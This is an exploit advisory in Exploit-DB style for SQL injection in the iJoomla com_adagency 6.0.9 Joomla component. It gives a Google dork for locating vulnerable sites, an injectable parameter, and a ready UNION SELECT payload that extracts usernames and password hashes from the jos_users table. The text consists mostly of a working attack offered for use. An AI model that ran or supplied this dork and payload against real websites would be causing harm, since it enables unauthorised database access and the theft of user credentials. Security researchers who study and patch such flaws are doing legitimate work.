# Exploit Title: iJoomla com_adagency 6.0.9 - SQL Injection Vulnerabilities # Date: 2020.05.02 # Author: Milad Karimi # Software Link: # Version: 6.0.9 # Category : webapps # Tested on: windows 10 , firefox # CVE : CWE-89 # Dork: inurl:index.php?option=com_adagency index.php?option=com_adagency&controller=adagencyAds&status_select=Y-1%27[SQLI]**&camp_id=3 Example: http://[site]/index.php?option=com_adagency&controller=adagencyAdvertisers&advertiser_status= -9999999/**/union/**/select/**/0,concat(username,0x3a,password),0x3a,concat(username,0x3a,password),/**/from/**/jos_users/**>